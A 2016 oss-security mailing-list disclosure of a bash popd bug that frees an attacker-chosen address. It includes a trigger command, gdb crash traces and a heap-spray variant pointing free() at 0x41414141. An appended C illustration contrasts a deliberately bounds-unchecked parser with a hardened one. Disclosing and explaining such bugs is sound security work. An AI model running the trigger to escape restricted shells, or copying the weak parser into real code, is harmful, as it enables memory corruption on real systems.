Date: Thu, 17 Nov 2016 12:04:49 -0500
From: Fernando Muñoz <fernando@...l-life.com>
To: oss-security@...ts.openwall.com
Cc: Chester Ramey <chet.ramey@...e.edu>
Subject: bash - popd controlled free

bash - popd controlled free
====================

popd can be tricked to free a user-supplied address in the following way:

$ popd +-111111

This could be used to bypass restricted shells (rsh) on some environments to cause a use-after-free.

This was already reported to the bash devs and only considered a bug; if MITRE considers it could have a security impact, please assign a CVE.

Details
======

$ gdb bash
...
(gdb) r -c 'popd +-67372036'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036'

Program received signal SIGSEGV, Segmentation fault.
0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384
384           free (pushd_directory_list[i]);
(gdb) print pushd_directory_list[i]
Cannot access memory at address 0x10101010

----

$ export AA=`perl -e 'print "A"x100000'`
$ gdb ./bash
...
(gdb) x/s *((char **)environ+13)
0xbffe75d4:     "AA=", 'A' <repeats 197 times>...
(gdb) run -c 'popd +-805281142'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142'

Program received signal SIGSEGV, Segmentation fault.
internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863
863       if (p->mh_alloc == ISMEMALIGN)

- Fernando
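The defect class behind the report, as an added illustration that is not bash's code and not part of the original post: a `+N` stack-index parser that lets strtol() consume a second sign after the leading '+' and checks only the upper bound, next to a version that rejects it. STACK_SIZE, REJECTED and the function names are assumptions made for this example.

```c
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

#define STACK_SIZE 4          /* assumed size of the directory stack array */
#define REJECTED   LONG_MIN   /* sentinel returned for an invalid index */

/* Weak parser (constructed to mirror the shape of the reported bug, not bash's
 * code): strtol() also accepts a '-' after the '+', so "+-67372036" parses, and
 * only the upper bound is checked; the negative index reaches the caller. */
long parse_index_weak(const char *arg)
{
    if (arg[0] != '+')
        return REJECTED;
    char *end;
    long v = strtol(arg + 1, &end, 10);
    if (*end != '\0' || v >= STACK_SIZE)
        return REJECTED;      /* missing: no check for v < 0 */
    return v;
}

/* Hardened parser: digits only after the '+', at least one of them, overflow
 * detected via errno, and both ends of the range checked before use. */
long parse_index_safe(const char *arg)
{
    if (arg[0] != '+' || !isdigit((unsigned char)arg[1]))
        return REJECTED;
    for (const char *p = arg + 1; *p != '\0'; p++)
        if (!isdigit((unsigned char)*p))
            return REJECTED;
    errno = 0;
    long v = strtol(arg + 1, NULL, 10);
    if (errno == ERANGE || v < 0 || v >= STACK_SIZE)
        return REJECTED;
    return v;
}

int main(void)
{
    const char *args[] = { "+2", "+-67372036", "+-805281142", "+99" };
    for (size_t i = 0; i < sizeof args / sizeof args[0]; i++)
        printf("%-12s weak=%ld safe=%ld  (%ld means rejected)\n", args[i],
               parse_index_weak(args[i]), parse_index_safe(args[i]), REJECTED);
    return 0;
}
```

The weak parser hands back -67372036 for the report's first argument; an array indexed with that value reads a pointer far outside the stack, which is the address free() then receives.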